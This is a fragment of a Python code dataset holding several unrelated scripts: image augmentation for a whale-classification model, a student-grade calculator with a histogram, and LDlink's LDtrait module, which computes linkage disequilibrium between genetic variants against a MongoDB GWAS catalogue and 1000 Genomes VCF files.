= time.time()\n print(t6-t5)\n\n t7 = time.time()\n fvec = np.vectorize(f)\n res = fvec(range(val))\n t8 = time.time()\n print(t8-t7)\n \n \n\n \n","sub_path":"multiproc.py","file_name":"multiproc.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"107944654","text":"from tensorflow.keras.applications import MobileNet\nfrom tensorflow.keras.applications.mobilenet import preprocess_input\nfrom tensorflow.keras.preprocessing.image import load_img, img_to_array\n\nimport tensorflow as tf\nimport sys\nold_stderr = sys.stderr\nsys.stderr = open('/dev/null', 'w')\nimport keras\nsys.stderr = old_stderr\n\n### train the model_pretrain of crapping\n\nfrom PIL import Image as pil_image\nfrom PIL.ImageDraw import Draw\nfrom os.path import isfile\n\n# def expand_path(p):\n# if isfile('../input/whale-categorization-playground/train/' + p): return '../input/whale-categorization-playground/train/' + p\n# if isfile('../input/whale-categorization-playground/test/' + p): return '../input/whale-categorization-playground/test/' + p\n# return p\n\ndef read_raw_image(p):\n return pil_image.open(p)\n#\n# def draw_dot(draw, x, y):\n# draw.ellipse(((x-5,y-5),(x+5,y+5)), fill='red', outline='red')\n#\n# def draw_dots(draw, coordinates):\n# for x,y in coordinates: draw_dot(draw, x, y)\n#\n# def bounding_rectangle(list):\n# x0, y0 = list[0]\n# x1, y1 = x0, y0\n# for x,y in list[1:]:\n# x0 = min(x0, x)\n# y0 = min(y0, y)\n# x1 = max(x1, x)\n# y1 = max(y1, y)\n# return x0,y0,x1,y1\n#\n# filename,coordinates = data[0]\n# box = bounding_rectangle(coordinates)\n# img = read_raw_image(filename)\n# draw = Draw(img)\n# draw_dots(draw, coordinates)\n# draw.rectangle(box, outline='red')\n# img\n\n######################\n### train the model_pretrain\n######################\nimg_shape = (128,128,1)\nanisotropy = 2.15\n\nimport random\nimport numpy as np\nfrom scipy.ndimage import affine_transform\nfrom keras.preprocessing.image import img_to_array\n\n# Read an image as black&white numpy array\ndef read_array(p):\n img = read_raw_image(p).convert('L')\n return img_to_array(img)\n\ndef build_transform(rotation, shear, height_zoom, width_zoom, height_shift, width_shift):\n rotation = np.deg2rad(rotation)\n shear = np.deg2rad(shear)\n rotation_matrix = np.array([[np.cos(rotation), np.sin(rotation), 0], [-np.sin(rotation), np.cos(rotation), 0], [0, 0, 1]])\n shift_matrix = np.array([[1, 0, height_shift], [0, 1, width_shift], [0, 0, 1]])\n shear_matrix = np.array([[1, np.sin(shear), 0], [0, np.cos(shear), 0], [0, 0, 1]])\n zoom_matrix = np.array([[1.0/height_zoom, 0, 0], [0, 1.0/width_zoom, 0], [0, 0, 1]])\n shift_matrix = np.array([[1, 0, -height_shift], [0, 1, -width_shift], [0, 0, 1]])\n return np.dot(np.dot(rotation_matrix, shear_matrix), np.dot(zoom_matrix, shift_matrix))\n\n# Compute the coordinate transformation required to center the pictures, padding as required.\ndef center_transform(affine, input_shape):\n hi, wi = float(input_shape[0]), float(input_shape[1])\n ho, wo = float(img_shape[0]), float(img_shape[1])\n top, left, bottom, right = 0, 0, hi, wi\n if wi/hi/anisotropy < wo/ho: # input image too narrow, extend width\n w = hi*wo/ho*anisotropy\n left = (wi-w)/2\n right = left + w\n else: # input image too wide, extend height\n h = wi*ho/wo/anisotropy\n top = (hi-h)/2\n bottom = top + h\n center_matrix = np.array([[1, 0, -ho/2], [0, 1, -wo/2], [0, 0, 1]])\n scale_matrix = np.array([[(bottom - top)/ho, 0, 0], [0, (right - left)/wo, 0], [0, 0, 1]])\n decenter_matrix = np.array([[1, 0, hi/2], [0, 1, wi/2], [0, 0, 1]])\n return np.dot(np.dot(decenter_matrix, scale_matrix), np.dot(affine, center_matrix))\n\n# Apply an affine transformation to an image represented as a numpy array.\ndef transform_img(x, affine):\n matrix = affine[:2,:2]\n offset = affine[:2,2]\n x = np.moveaxis(x, -1, 0)\n channels = [affine_transform(channel, matrix, offset, output_shape=img_shape[:-1], order=1,\n mode='constant', cval=np.average(channel)) for channel in x]\n return np.moveaxis(np.stack(channels, axis=0), 0, -1)\n\n# Read an image for validation, i.e. without data augmentation.\ndef read_for_validation(p):\n x = read_array(p)\n t = np.array([[1, 0, 0], [0, 1, 0], [0, 0, 1]])\n t = center_transform(t, x.shape)\n x = transform_img(x, t)\n x -= np.mean(x, keepdims=True)\n x /= np.std(x, keepdims=True) + K.epsilon()\n return x,t\n\n# Read an image for training, i.e. including a random affine transformation\nfrom keras import backend as K\ndef read_for_training(p):\n x = read_array(p)\n t = build_transform(\n random.uniform(-5, 5),\n random.uniform(-5, 5),\n random.uniform(0.9, 1.0),\n random.uniform(0.9, 1.0),\n random.uniform(-0.05*img_shape[0], 0.05*img_shape[0]),\n random.uniform(-0.05*img_shape[1], 0.05*img_shape[1]))\n t = center_transform(t, x.shape)\n x = transform_img(x, t)\n x -= np.mean(x, keepdims=True)\n x /= np.std(x, keepdims=True) + K.epsilon()\n return x,t\n\n# Transform corrdinates according to the provided affine transformation\ndef coord_transform(list, trans):\n result = []\n for x,y in list:\n y,x,_ = trans.dot([y,x,1]).astype(np.int)\n result.append((x,y))\n return result\n\n\n# tf.image.decode_jpeg()\n#\n# model_pretrain = MobileNet(input_shape=(224,224,3))\n# embeded_train = model_pretrain.predict(train_ds)","sub_path":"z_script/20200221_NONEED.py","file_name":"20200221_NONEED.py","file_ext":"py","file_size_in_byte":5277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"226755869","text":"import numpy as np\nimport matplotlib.mlab as mlab\nimport matplotlib.pyplot as plt\n\n#arrays for all of the scores for each student, student grades are verticle\nHomework = np.array([10., 10., 8., 9.5, 3., 9., 0, 6.]) \nMid_term = np.array([10., 10., 10., 10., 8., 5., 10., 7.]) \nFinal_Project = np.array([9., 10., 10., 6., 10., 6., 8., 9.])\n\n# This calcualtes final grade and adds each grade to a list\ni=0\nGrade=0\nlist_Grades = [] #an empty list\nwhile i < Homework.shape[0]:\n\tGrade = Homework[i]*0.4 + Mid_term[i]*0.2 + Final_Project[i]*0.4\n\ti=i+1\n\tlist_Grades.append(Grade) #adds grade value to empty list\n\n# This is to get the program to write the list to a file\nprintFile = open('List of Grades.txt', 'w+')\nprintFile.write(\"\\n\".join(map(lambda x: str(x), list_Grades)))\n#printFile.write(\"\\n\".join(str(x) for x in list_Grades)) Another way to do it\nprintFile.close()\n\n# Now to check how many failed\nk=0 \nfailCount = 0\nwhile k < Homework.shape[0]:\n\tif list_Grades[k] < 6:\n\t\tfailCount = failCount + 1\n\tk = k + 1\nprint ('\\nNumber of students that failed:', failCount)\n\n# Now to check how many \"outstanding\" students\nm = 0\noutStudent = 0\nwhile m < Homework.shape[0]:\n\tif list_Grades[m] > 9.5:\n\t\toutStudent = outStudent + 1\n\tm = m + 1\nprint ('\\nNumber of outstanding students:', outStudent)\n\n#Histogram\nnum_bins = 10\n# the histogram of the data\nn, bins, patches = plt.hist(list_Grades, num_bins, facecolor='blue', alpha=0.5)\n#get rid of normed=1 from matplotlib.org example, caused problems with y-axis\nplt.xlabel('Score')\nplt.ylabel('Students')\nplt.title(r'Histogram of Student Grades')\n# Tweak spacing to prevent clipping of ylabel\nplt.subplots_adjust(left=0.15)\n#use this to show plot instead of saving it: plt.show()\n\n#save using a .png, save histogram\nplt.savefig('Histogram.png', format = 'png')\n\n","sub_path":"Week1/Ex2.py","file_name":"Ex2.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"302648881","text":"#!/usr/bin/env python3\n\nimport yaml\nimport json\nimport copy\nimport math\nimport os\nimport collections\nimport re\nfrom pymongo import MongoClient\nfrom pymongo.errors import ConnectionFailure\nfrom bson import json_util, ObjectId\nimport subprocess\nfrom multiprocessing import Pool\nimport sys\nimport numpy as np\t\nfrom timeit import default_timer as timer\n\n\n# Set data directories using config.yml\t\nwith open('config.yml', 'r') as f:\t\n config = yaml.load(f)\t\nenv = config['env']\napi_mongo_addr = config['api']['api_mongo_addr']\ndbsnp_version = config['data']['dbsnp_version']\t\npop_dir = config['data']['pop_dir']\t\nvcf_dir = config['data']['vcf_dir']\nmongo_username = config['database']['mongo_user_readonly']\nmongo_password = config['database']['mongo_password']\nmongo_port = config['database']['mongo_port']\n\ndef get_ldtrait_timestamp(web):\n try:\n with open('config.yml', 'r') as c:\n config = yaml.load(c)\n env = config['env']\n api_mongo_addr = config['api']['api_mongo_addr']\n mongo_username = config['database']['mongo_user_readonly']\n mongo_password = config['database']['mongo_password']\n mongo_port = config['database']['mongo_port']\n\n # Connect to Mongo snp database\n if env == 'local':\n mongo_host = api_mongo_addr\n else: \n mongo_host = 'localhost'\n if web:\n client = MongoClient('mongodb://' + mongo_username + ':' + mongo_password + '@' + mongo_host + '/admin', mongo_port)\n else:\n if env == 'local':\n client = MongoClient('mongodb://' + mongo_username + ':' + mongo_password + '@' + mongo_host + '/admin', mongo_port)\n else:\n client = MongoClient('localhost', mongo_port)\n except ConnectionFailure:\n print(\"MongoDB is down\")\n print(\"syntax: mongod --dbpath /local/content/analysistools/public_html/apps/LDlink/data/mongo/data/db/ --auth\")\n return \"Failed to connect to server.\"\n\n db = client[\"LDLink\"]\n for document in db.gwas_catalog.find().sort(\"_id\", -1).limit(1):\n object_id_datetime = document.get('_id').generation_time\n json_output = json.dumps(object_id_datetime, default=json_util.default, sort_keys=True, indent=2)\n return json_output\n\n\ndef get_window_variants(db, chromosome, position, window):\n query_results = db.gwas_catalog.find({\n \"chromosome_grch37\": chromosome, \n \"position_grch37\": {\n \"$gte\": (position - window) if (position - window) > 0 else 0, \n \"$lte\": position + window\n }\n })\n query_results_sanitized = json.loads(json_util.dumps(query_results))\n return query_results_sanitized\n\ndef expandSelectedPopulationGroups(pops):\n expandedPops = copy.deepcopy(pops)\n pop_groups = {\n \"ALL\": [\"ACB\", \"ASW\", \"BEB\", \"CDX\", \"CEU\", \"CHB\", \"CHS\", \"CLM\", \"ESN\", \"FIN\", \"GBR\", \"GIH\", \"GWD\", \"IBS\", \"ITU\", \"JPT\", \"KHV\", \"LWK\", \"MSL\", \"MXL\", \"PEL\", \"PJL\", \"PUR\", \"STU\", \"TSI\", \"YRI\"],\n \"AFR\": [\"YRI\", \"LWK\", \"GWD\", \"MSL\", \"ESN\", \"ASW\", \"ACB\"],\n \"AMR\": [\"MXL\", \"PUR\", \"CLM\", \"PEL\"],\n \"EAS\": [\"CHB\", \"JPT\", \"CHS\", \"CDX\", \"KHV\"],\n \"EUR\": [\"CEU\", \"TSI\", \"FIN\", \"GBR\" , \"IBS\"],\n \"SAS\": [\"GIH\", \"PJL\", \"BEB\", \"STU\" , \"ITU\"]\n }\n if \"ALL\" in pops:\n expandedPops.remove(\"ALL\")\n expandedPops = pop_groups[\"ALL\"]\n expandedPops = list(set(expandedPops)) # unique elements\n return expandedPops\n else:\n if \"AFR\" in pops:\n expandedPops.remove(\"AFR\")\n expandedPops = expandedPops + pop_groups[\"AFR\"]\n expandedPops = list(set(expandedPops)) # unique elements\n if \"AMR\" in pops:\n expandedPops.remove(\"AMR\")\n expandedPops = expandedPops + pop_groups[\"AMR\"]\n expandedPops = list(set(expandedPops)) # unique elements\n if \"EAS\" in pops:\n expandedPops.remove(\"EAS\")\n expandedPops = expandedPops + pop_groups[\"EAS\"]\n expandedPops = list(set(expandedPops)) # unique elements\n if \"EUR\" in pops:\n expandedPops.remove(\"EUR\")\n expandedPops = expandedPops + pop_groups[\"EUR\"]\n expandedPops = list(set(expandedPops)) # unique elements\n if \"SAS\" in pops:\n expandedPops.remove(\"SAS\")\n expandedPops = expandedPops + pop_groups[\"SAS\"]\n expandedPops = list(set(expandedPops)) # unique elements\n return expandedPops\n\ndef get_ld_stats(variantPair, pop_ids):\t\n # parse ld pair array parameter input\n snp1 = variantPair[0]\n snp1_coord = {\n \"chromosome\": variantPair[1], \n \"position\": variantPair[2]\n }\n snp2 = variantPair[3]\n snp2_coord = {\n \"chromosome\": variantPair[4], \n \"position\": variantPair[5]\n }\n\n # errors/warnings encountered\t\n output = {\t\n \"error\": [],\t\n \"warning\": []\t\n }\t\n # Extract 1000 Genomes phased genotypes\t\n # SNP1\t\n vcf_file1 = vcf_dir + snp1_coord['chromosome'] + \".phase3_shapeit2_mvncall_integrated_v5.20130502.genotypes.vcf.gz\"\t\n tabix_snp1_offset = \"tabix {0} {1}:{2}-{2} | grep -v -e END\".format(\t\n vcf_file1, snp1_coord['chromosome'], snp1_coord['position'])\t\n proc1_offset = subprocess.Popen(\t\n tabix_snp1_offset, shell=True, stdout=subprocess.PIPE)\t\n vcf1_offset = [x.decode('utf-8') for x in proc1_offset.stdout.readlines()]\t\n # SNP2\t\n vcf_file2 = vcf_dir + snp2_coord['chromosome'] + \".phase3_shapeit2_mvncall_integrated_v5.20130502.genotypes.vcf.gz\"\t\n tabix_snp2_offset = \"tabix {0} {1}:{2}-{2} | grep -v -e END\".format(\t\n vcf_file2, snp2_coord['chromosome'], snp2_coord['position'])\t\n proc2_offset = subprocess.Popen(\t\n tabix_snp2_offset, shell=True, stdout=subprocess.PIPE)\t\n vcf2_offset = [x.decode('utf-8') for x in proc2_offset.stdout.readlines()]\t\n\n vcf1_pos = snp1_coord['position']\t\n vcf2_pos = snp2_coord['position']\t\n vcf1 = vcf1_offset\t\n vcf2 = vcf2_offset\t\n\n # SNP1\t\n if len(vcf1) == 0:\t\n output[\"error\"].append(snp1 + \" is not in 1000G reference panel.\")\t\n return {\t\n \"r2\": \"NA\",\t\n \"D_prime\": \"NA\",\t\n \"p\": \"NA\",\t\n \"alleles\": \"NA\",\t\n \"output\": output\t\n }\t\n elif len(vcf1) > 1:\t\n geno1 = []\t\n for i in range(len(vcf1)):\t\n if vcf1[i].strip().split()[2] == snp1:\t\n geno1 = vcf1[i].strip().split()\t\n if geno1 == []:\t\n output[\"error\"].append(snp1 + \" is not in 1000G reference panel.\")\t\n return {\t\n \"r2\": \"NA\",\t\n \"D_prime\": \"NA\",\t\n \"p\": \"NA\",\t\n \"alleles\": \"NA\",\t\n \"output\": output\t\n }\t\n else:\t\n geno1 = vcf1[0].strip().split()\t\n if geno1[2] != snp1:\t\n output[\"warning\"].append(\"Genomic position for query variant1 (\" + snp1 + \") does not match RS number at 1000G position (chr\" + geno1[0]+\":\"+geno1[1]+\")\")\t\n snp1 = geno1[2]\t\n if \",\" in geno1[3] or \",\" in geno1[4]:\t\n output[\"error\"].append(snp1 + \" is not a biallelic variant.\")\t\n return {\t\n \"r2\": \"NA\",\t\n \"D_prime\": \"NA\",\t\n \"p\": \"NA\",\t\n \"alleles\": \"NA\",\t\n \"output\": output\t\n }\t\n if len(geno1[3]) == 1 and len(geno1[4]) == 1:\t\n snp1_a1 = geno1[3]\t\n snp1_a2 = geno1[4]\t\n elif len(geno1[3]) == 1 and len(geno1[4]) > 1:\t\n snp1_a1 = \"-\"\t\n snp1_a2 = geno1[4][1:]\t\n elif len(geno1[3]) > 1 and len(geno1[4]) == 1:\t\n snp1_a1 = geno1[3][1:]\t\n snp1_a2 = \"-\"\t\n elif len(geno1[3]) > 1 and len(geno1[4]) > 1:\t\n snp1_a1 = geno1[3][1:]\t\n snp1_a2 = geno1[4][1:]\t\n allele1 = {\t\n \"0|0\": [snp1_a1, snp1_a1], \t\n \"0|1\": [snp1_a1, snp1_a2], \t\n \"1|0\": [snp1_a2, snp1_a1], \t\n \"1|1\": [snp1_a2, snp1_a2], \t\n \"0\": [snp1_a1, \".\"], \t\n \"1\": [snp1_a2, \".\"], \t\n \"./.\": [\".\", \".\"], \t\n \".\": [\".\", \".\"]\t\n }\t\n # SNP2\t\n if len(vcf2) == 0:\t\n output[\"error\"].append(snp2 + \" is not in 1000G reference panel.\")\t\n return {\t\n \"r2\": \"NA\",\t\n \"D_prime\": \"NA\",\t\n \"p\": \"NA\",\t\n \"alleles\": \"NA\",\t\n \"output\": output\t\n }\t\n elif len(vcf2) > 1:\t\n geno2 = []\t\n for i in range(len(vcf2)):\t\n if vcf2[i].strip().split()[2] == snp2:\t\n geno2 = vcf2[i].strip().split()\t\n if geno2 == []:\t\n output[\"error\"].append(snp2 + \" is not in 1000G reference panel.\")\t\n return {\t\n \"r2\": \"NA\",\t\n \"D_prime\": \"NA\",\t\n \"p\": \"NA\",\t\n \"alleles\": \"NA\",\t\n \"output\": output\t\n }\t\n else:\t\n geno2 = vcf2[0].strip().split()\t\n if geno2[2] != snp2:\t\n output[\"warning\"].append(\"Genomic position for query variant2 (\" + snp2 + \") does not match RS number at 1000G position (chr\" + geno2[0] + \":\" + geno2[1] + \")\")\t\n snp2 = geno2[2]\t\n if \",\" in geno2[3] or \",\" in geno2[4]:\t\n output[\"error\"].append(snp2 + \" is not a biallelic variant.\")\t\n return {\t\n \"r2\": \"NA\",\t\n \"D_prime\": \"NA\",\t\n \"p\": \"NA\",\t\n \"alleles\": \"NA\",\t\n \"output\": output\t\n }\t\n if len(geno2[3]) == 1 and len(geno2[4]) == 1:\t\n snp2_a1 = geno2[3]\t\n snp2_a2 = geno2[4]\t\n elif len(geno2[3]) == 1 and len(geno2[4]) > 1:\t\n snp2_a1 = \"-\"\t\n snp2_a2 = geno2[4][1:]\t\n elif len(geno2[3]) > 1 and len(geno2[4]) == 1:\t\n snp2_a1 = geno2[3][1:]\t\n snp2_a2 = \"-\"\t\n elif len(geno2[3]) > 1 and len(geno2[4]) > 1:\t\n snp2_a1 = geno2[3][1:]\t\n snp2_a2 = geno2[4][1:]\t\n allele2 = {\t\n \"0|0\": [snp2_a1, snp2_a1], \t\n \"0|1\": [snp2_a1, snp2_a2], \t\n \"1|0\": [snp2_a2, snp2_a1], \t\n \"1|1\": [snp2_a2, snp2_a2], \t\n \"0\": [snp2_a1, \".\"], \t\n \"1\": [snp2_a2, \".\"], \t\n \"./.\": [\".\", \".\"], \t\n \".\": [\".\", \".\"]\t\n }\t\n \n if geno1[1] != vcf1_pos:\t\n output[\"error\"].append(\"VCF File does not match variant coordinates for SNP1.\")\t\n return {\t\n \"r2\": \"NA\",\t\n \"D_prime\": \"NA\",\t\n \"p\": \"NA\",\t\n \"alleles\": \"NA\",\t\n \"output\": output\t\n }\t\n if geno2[1] != vcf2_pos:\t\n output[\"error\"].append(\"VCF File does not match variant coordinates for SNP2.\")\t\n return {\t\n \"r2\": \"NA\",\t\n \"D_prime\": \"NA\",\t\n \"p\": \"NA\",\t\n \"alleles\": \"NA\",\t\n \"output\": output\t\n }\t\n\n # Get headers\t\n tabix_snp1_h = \"tabix -H {0} | grep CHROM\".format(vcf_file1)\t\n proc1_h = subprocess.Popen(\t\n tabix_snp1_h, shell=True, stdout=subprocess.PIPE)\t\n head1 = [x.decode('utf-8') for x in proc1_h.stdout.readlines()][0].strip().split()\t\n tabix_snp2_h = \"tabix -H {0} | grep CHROM\".format(vcf_file2)\t\n proc2_h = subprocess.Popen(\t\n tabix_snp2_h, shell=True, stdout=subprocess.PIPE)\t\n head2 = [x.decode('utf-8') for x in proc2_h.stdout.readlines()][0].strip().split()\t\n # Combine phased genotypes\t\n geno = {}\t\n for i in range(9, len(head1)):\t\n geno[head1[i]] = [allele1[geno1[i]], \"..\"]\t\n for i in range(9, len(head2)):\t\n if head2[i] in geno:\t\n geno[head2[i]][1] = allele2[geno2[i]]\t\n\n # Extract haplotypes\t\n hap = {}\t\n for ind in pop_ids:\t\n if ind in geno:\t\n hap1 = geno[ind][0][0] + \"_\" + geno[ind][1][0]\t\n hap2 = geno[ind][0][1] + \"_\" + geno[ind][1][1]\t\n if hap1 in hap:\t\n hap[hap1] += 1\t\n else:\t\n hap[hap1] = 1\t\n if hap2 in hap:\t\n hap[hap2] += 1\t\n else:\t\n hap[hap2] = 1\t\n\n # Remove missing haplotypes\t\n keys = list(hap.keys())\t\n for key in keys:\t\n if \".\" in key:\t\n hap.pop(key, None)\t\n # Check all haplotypes are present\t\n if len(hap) != 4:\t\n snp1_a = [snp1_a1, snp1_a2]\t\n snp2_a = [snp2_a1, snp2_a2]\t\n haps = [snp1_a[0] + \"_\" + snp2_a[0], snp1_a[0] + \"_\" + snp2_a[1],\t\n snp1_a[1] + \"_\" + snp2_a[0], snp1_a[1] + \"_\" + snp2_a[1]]\t\n for i in haps:\t\n if i not in hap:\t\n hap[i] = 0\t\n\n # Sort haplotypes\n A = hap[sorted(hap)[0]]\n B = hap[sorted(hap)[1]]\n C = hap[sorted(hap)[2]]\n D = hap[sorted(hap)[3]]\n N = A + B + C + D\n # tmax = max(A, B, C, D)\n\n hap1 = sorted(hap, key=hap.get, reverse=True)[0]\n hap2 = sorted(hap, key=hap.get, reverse=True)[1]\n # hap3 = sorted(hap, key=hap.get, reverse=True)[2]\n # hap4 = sorted(hap, key=hap.get, reverse=True)[3]\n\n delta = float(A * D - B * C)\n Ms = float((A + C) * (B + D) * (A + B) * (C + D))\n # print(\"Ms=\", Ms)\n if Ms != 0:\n # D prime\n if delta < 0:\n D_prime = abs(delta / min((A + C) * (A + B), (B + D) * (C + D)))\n else:\n D_prime = abs(delta / min((A + C) * (C + D), (A + B) * (B + D)))\n # R2\n r2 = (delta**2) / Ms\n else:\n output[\"error\"].append(\"Variant MAF is 0.0, variant removed.\")\t\n return {\t\n \"r2\": \"NA\",\t\n \"D_prime\": \"NA\",\t\n \"alleles\": \"NA\",\t\n \"output\": output\t\n }\n\n allele1 = str(sorted(hap)[0].split(\"_\")[1])\n allele1_freq = str(round(float(A + C) / N, 3)) if N > float(A + C) else \"NA\"\n\n allele2 = str(sorted(hap)[1].split(\"_\")[1])\n allele2_freq = str(round(float(B + D) / N, 3)) if N > float(B + D) else \"NA\"\n\n alleles = \", \".join([\"=\".join([allele1, allele1_freq]),\"=\".join([allele2, allele2_freq])])\n\n return {\n \"r2\": r2,\n \"D_prime\": D_prime,\n \"alleles\": alleles,\n \"output\": output\n }\n\ndef get_ld_stats_sub(threadCommandArgs):\t\n variantPairs = threadCommandArgs[0]\t\n pop_ids = threadCommandArgs[1]\t\n thread = threadCommandArgs[2]\t\n print(\"thread \" + str(thread) + \" kicked\")\t\n ldInfoSubset = {}\t\n for variantPair in variantPairs:\t\t\n ld = get_ld_stats(variantPair, pop_ids)\t\t\n # print(\"thread\", thread, \"variantPair\", variantPair, \"ld\", ld)\t\t\n # ld = {\t\t\n # \"r2\": \"NA\",\t\t\n # \"D_prime\": \"NA\",\t\t\n # \"p\": \"NA\",\t\t\n # \"output\": []\t\t\n # }\t\t\n # store LD calculation results in a object\t\t\n if variantPair[0] not in ldInfoSubset:\t\t\n ldInfoSubset[variantPair[0]] = {}\t\t\n ldInfoSubset[variantPair[0]][variantPair[3]] = ld\t\t\n else:\t\t\n ldInfoSubset[variantPair[0]][variantPair[3]] = ld\t\t\n return ldInfoSubset\t\n\ndef castFloat(val):\n try:\n val_float = float(val)\n return val_float\n except ValueError:\n return val\n\ndef findRangeString(val):\n result = re.sub(r\"\\[*\\]*[a-zA-Z]*\\s*\", \"\", val)\n if len(result) > 0:\n return result\n else:\n return \"NA\"\n\ndef get_gwas_fields(query_snp, query_snp_chr, query_snp_pos, found, pops, pop_ids, ldInfo, r2_d, r2_d_threshold):\t \n matched_snps = []\n window_problematic_snps = []\n for record in found:\n ld = ldInfo.get(query_snp).get(\"rs\" + record[\"SNP_ID_CURRENT\"])\n if (ld[\"r2\"] != \"NA\" or ld[\"D_prime\"] != \"NA\"):\n if ((r2_d == \"r2\" and ld[\"r2\"] >= r2_d_threshold) or (r2_d == \"d\" and ld[\"D_prime\"] >= r2_d_threshold)):\n matched_record = []\n # Query SNP\n # matched_record.append(query_snp)\n # GWAS Trait\n matched_record.append(record[\"DISEASE/TRAIT\"]) \n # RS Number\n matched_record.append(\"rs\" + record[\"SNP_ID_CURRENT\"]) \n # Position\n matched_record.append(\"chr\" + str(record[\"chromosome_grch37\"]) + \":\" + str(record[\"position_grch37\"]))\n # Alleles\t\n matched_record.append(ld[\"alleles\"])\t\n # R2\t\n matched_record.append(ld[\"r2\"])\t\n # D'\t\n matched_record.append(ld[\"D_prime\"])\t\n # LDpair (Link)\t\n matched_record.append([query_snp, \"rs\" + record[\"SNP_ID_CURRENT\"], \"%2B\".join(expandSelectedPopulationGroups(pops))])\n # Risk Allele\n matched_record.append(record[\"RISK ALLELE FREQUENCY\"] if (\"RISK ALLELE FREQUENCY\" in record and len(record[\"RISK ALLELE FREQUENCY\"]) > 0) else \"NA\")\n # Beta or OR\n matched_record.append(castFloat(record[\"OR or BETA\"]) if (\"OR or BETA\" in record and len(record[\"OR or BETA\"]) > 0) else \"NA\")\n # Effect Size (95% CI)\n matched_record.append(findRangeString(record[\"95% CI (TEXT)\"]) if (\"95% CI (TEXT)\" in record and len(record[\"95% CI (TEXT)\"]) > 0) else \"NA\")\n # P-value\n matched_record.append(record[\"P-VALUE\"] if (\"P-VALUE\" in record and len(record[\"P-VALUE\"]) > 0) else \"NA\")\n # GWAS Catalog (Link)\n matched_record.append(\"rs\" + record[\"SNP_ID_CURRENT\"])\n # Details\n # matched_record.append(\"Variant found in GWAS catalog within window.\")\n # print(\"matched_record\", matched_record)\n matched_snps.append(matched_record)\n else: \n if (r2_d == \"r2\"):\n problematic_record = [query_snp, \"rs\" + record[\"SNP_ID_CURRENT\"], \"chr\" + str(record[\"chromosome_grch37\"]) + \":\" + str(record[\"position_grch37\"]), record[\"DISEASE/TRAIT\"] if (\"DISEASE/TRAIT\" in record and len(record[\"DISEASE/TRAIT\"]) > 0) else \"NA\", \"R2 value (\" + str(ld[\"r2\"]) + \") below threshold (\" + str(r2_d_threshold) + \")\"]\n window_problematic_snps.append(problematic_record)\n else:\n problematic_record = [query_snp, \"rs\" + record[\"SNP_ID_CURRENT\"], \"chr\" + str(record[\"chromosome_grch37\"]) + \":\" + str(record[\"position_grch37\"]), record[\"DISEASE/TRAIT\"] if (\"DISEASE/TRAIT\" in record and len(record[\"DISEASE/TRAIT\"]) > 0) else \"NA\", \"D' value (\" + str(ld[\"D_prime\"]) + \") below threshold. (\" + str(r2_d_threshold) + \")\"]\n window_problematic_snps.append(problematic_record)\n else:\n problematic_record = [query_snp, \"rs\" + record[\"SNP_ID_CURRENT\"], \"chr\" + str(record[\"chromosome_grch37\"]) + \":\" + str(record[\"position_grch37\"]), record[\"DISEASE/TRAIT\"] if (\"DISEASE/TRAIT\" in record and len(record[\"DISEASE/TRAIT\"]) > 0) else \"NA\", \" \".join(ld[\"output\"][\"error\"])]\n window_problematic_snps.append(problematic_record)\n return (matched_snps, window_problematic_snps)\n\n# Create LDtrait function\ndef calculate_trait(snplst, pop, request, web, r2_d, r2_d_threshold=0.1):\n print(\"##### START LD TRAIT CALCULATION #####\")\t\n start = timer()\n \n # snp limit\n max_list = 50\n\n # Ensure tmp directory exists\n tmp_dir = \"./tmp/\"\n if not os.path.exists(tmp_dir):\n os.makedirs(tmp_dir)\n\n # Create JSON output for warnings and errors\n out_json = open(tmp_dir + \"trait\" + str(request) + \".json\", \"w\")\n output = {}\n\n # open snps file\n with open(snplst, 'r') as fp:\n snps_raw = fp.readlines()\n # Generate error if # of inputted SNPs exceeds limit\n if len(snps_raw) > max_list:\n output[\"error\"] = \"Maximum SNP list is \" + \\\n str(max_list)+\" RS numbers. Your list contains \" + \\\n str(len(snps_raw))+\" entries.\"\n json_output = json.dumps(output, sort_keys=True, indent=2)\n print(json_output, file=out_json)\n out_json.close()\n return(\"\", \"\", \"\")\n # Remove duplicate RS numbers\n sanitized_query_snps = []\n for snp_raw in snps_raw:\n snp = snp_raw.strip()\n if snp not in sanitized_query_snps:\n sanitized_query_snps.append([snp])\n\n # Connect to Mongo snp database\n if env == 'local':\n mongo_host = api_mongo_addr\n else: \n mongo_host = 'localhost'\n if web:\n client = MongoClient('mongodb://' + mongo_username + ':' + mongo_password + '@'+mongo_host+'/admin', mongo_port)\n else:\n if env == 'local':\n client = MongoClient('mongodb://' + mongo_username + ':' + mongo_password + '@'+mongo_host+'/admin', mongo_port)\n else:\n client = MongoClient('localhost', mongo_port)\n db = client[\"LDLink\"]\n # Check if gwas_catalog collection in MongoDB exists, if not, display error\n if \"gwas_catalog\" not in db.list_collection_names():\n output[\"error\"] = \"GWAS Catalog database is currently being updated. Please check back later.\"\n json_output = json.dumps(output, sort_keys=True, indent=2)\n print(json_output, file=out_json)\n out_json.close()\n return(\"\", \"\", \"\")\n\n # Select desired ancestral populations\n pops = pop.split(\"+\")\n pop_dirs = []\n for pop_i in pops:\n if pop_i in [\"ALL\", \"AFR\", \"AMR\", \"EAS\", \"EUR\", \"SAS\", \"ACB\", \"ASW\", \"BEB\", \"CDX\", \"CEU\", \"CHB\", \"CHS\", \"CLM\", \"ESN\", \"FIN\", \"GBR\", \"GIH\", \"GWD\", \"IBS\", \"ITU\", \"JPT\", \"KHV\", \"LWK\", \"MSL\", \"MXL\", \"PEL\", \"PJL\", \"PUR\", \"STU\", \"TSI\", \"YRI\"]:\n pop_dirs.append(pop_dir+pop_i+\".txt\")\n else:\n output[\"error\"] = pop_i+\" is not an ancestral population. Choose one of the following ancestral populations: AFR, AMR, EAS, EUR, or SAS; or one of the following sub-populations: ACB, ASW, BEB, CDX, CEU, CHB, CHS, CLM, ESN, FIN, GBR, GIH, GWD, IBS, ITU, JPT, KHV, LWK, MSL, MXL, PEL, PJL, PUR, STU, TSI, or YRI.\"\n json_output = json.dumps(output, sort_keys=True, indent=2)\n print(json_output, file=out_json)\n out_json.close()\n return(\"\", \"\", \"\")\n\n get_pops = \"cat \" + \" \".join(pop_dirs)\n proc = subprocess.Popen(get_pops, shell=True, stdout=subprocess.PIPE)\n pop_list = [x.decode('utf-8') for x in proc.stdout.readlines()]\n\n ids = 